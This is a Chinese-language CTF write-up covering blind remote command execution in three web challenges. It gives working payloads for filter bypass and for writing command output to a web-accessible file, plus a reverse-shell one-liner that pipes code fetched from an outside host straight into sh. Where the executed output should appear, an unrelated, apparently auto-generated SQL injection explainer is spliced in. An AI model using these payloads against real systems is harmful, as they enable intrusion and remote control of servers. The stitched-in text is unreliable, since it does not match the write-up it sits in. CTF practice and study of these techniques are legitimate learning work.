【Web】无回显RCE相关例题wp(1)

目录

①[SWPUCTF 2021 新生赛]finalrce

②[SWPUCTF 2023 秋季新生赛]RCE-PLUS

③[CTFSHOW]web807


这块还是很有嚼头的,准备分几次总结

命令执行无回显rce思路:

1.利用dnslog带外

2.写马

3.反弹shell

4.写文件然后访问文件

①[SWPUCTF 2021 新生赛]finalrce

 过滤了不少东西(其实不怕,关键词过滤\分割绕过不就行hhh)

最麻烦的exec命令执行是无回显的

用下面这种方法最省事:

command | tee file.txt

可以看到的是过滤了>,但没有过滤|,tee将想要执行的命令写入到一个文件里面,然后再去访问这个文件,以此来看见命令执行的回显

payload:

?url=l\s / | tee 1.txt

访问1.txt

跟进

?url=tac /flllll\aaaaaaggggggg | tee 2.txt 

(因为la被过滤,仔细看哈)

访问2.txt

②[SWPUCTF 2023 秋季新生赛]RCE-PLUS

 shell_exec也无回显

waf把|和>都放出来了,用上题payload也可以打

我们这题就换个比较常见的>

payload:

?cmd=ls / > 2.txt

访问2.txt

 ?cmd=tac /f* > 2.txt 

访问2.txt

③[CTFSHOW]web807

 

 curl这是让我反弹shell了啊

推荐一个网站:https://your-shell.com/

傻瓜型反弹shell,我行你也行

payload:

?url=https://your-shell.com/124.222.136.33:1337 | sh 

(先在自己vps开启1337端口监听)

贴出执行:

SQL注入是一种黑客攻击手段,通过将恶意构造的SQL查询插入到输入字段中,攻击者可以获取敏感信息、篡改数据库内容或甚至获得对系统的访问权限。当存在SQL注入漏洞时,“数据无回显”通常指的是从数据库返回的结果并没有正常显示给用户。 这种现象可能发生在以下几个场景: ### 1. **结果未正确呈现** - 当用户输入的数据包含恶意SQL代码时,应用可能会尝试执行这些代码,而不是只处理表单中的实际数据。如果应用没有适当检查或过滤输入,并直接将用户提交的内容拼接到SQL查询字符串中,则可能导致整个查询被执行而不显示预期的结果页面或数据。 ### 2. **错误消息泄露信息** - 尽管最终结果可能没有如预期地展示出来,但是服务器仍然有可能生成并返回错误消息或状态码。例如,如果执行的SQL查询导致了一个语法错误,服务器会返回相应的错误信息(如“解析错误”、“行号列号信息”等),这实际上已经向攻击者透露了部分关于数据库结构的信息。 ### 3. **数据库特定响应** - 某些数据库系统或应用配置可能会在执行某些操作失败时返回特定的响应代码或错误信息,而这些信息对于理解查询意图是有帮助的,比如返回特定的状态代码表示查询超时或是数据量过大。 ### 4. **隐藏数据的特性** - 在一些情况下,应用的设计或框架可能会有意地隐藏数据回显的行为,尤其是在执行某些敏感操作时(例如删除数据、修改权限等)。这时,即使有数据操作发生,也可能不会在界面上显示任何反馈信息,使得外部观察者无法判断操作是否成功完成。 为了防止SQL注入成功导致数据无回显的问题,关键在于加强输入验证和清理、使用预编译语句(参数化查询)、限制数据库权限以及进行全面的安全审计和测试。这些措施可以帮助减少攻击面,确保应用程序能够安全地处理来自用户的输入,并有效防止潜在的SQL注入威胁。 --- ## 相关问题 - SQL注入: 1. **如何检测和预防SQL注入?** - 预编译语句、输入验证、最小权限原则、定期安全审核。 2. **SQL注入可能引发的具体风险有哪些?** - 数据泄露、系统控制权丢失、非授权访问等。 3. **为什么需要避免在SQL查询中直接拼接用户输入?** - 避免SQL注入攻击,保护系统免受恶意输入的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值